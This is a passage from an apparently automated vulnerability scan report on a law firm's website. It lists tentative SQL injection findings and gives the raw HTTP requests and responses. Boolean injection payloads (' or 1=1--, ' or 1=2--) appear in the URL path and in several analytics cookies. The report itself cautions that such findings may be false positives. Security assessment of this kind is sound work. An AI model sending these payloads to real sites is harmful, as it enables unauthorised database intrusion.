X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 16:46:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=11780295'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.66. http://www.pillsburylaw.com/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14296614'%20or%201%3d1--%20 and 14296614'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm14296614'%20or%201%3d1--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:47:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /index.cfm14296614'%20or%201%3d2--%20?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.67. http://www.pillsburylaw.com/index.cfm [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12857343'%20or%201%3d1--%20 and 12857343'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 16:45:03 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312857343'%20or%201%3d2--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:45:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.68. http://www.pillsburylaw.com/index.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 11705977'%20or%201%3d1--%20 and 11705977'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 12-May-2010 16:46:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.130521865811705977'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.69. http://www.pillsburylaw.com/index.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 62299062%20or%201%3d1--%20 and 62299062%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d1--%20; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 12-May-2010 16:46:45 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=24928704662299062%20or%201%3d2--%20; __utmb=249287046.1.10.1305218658

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
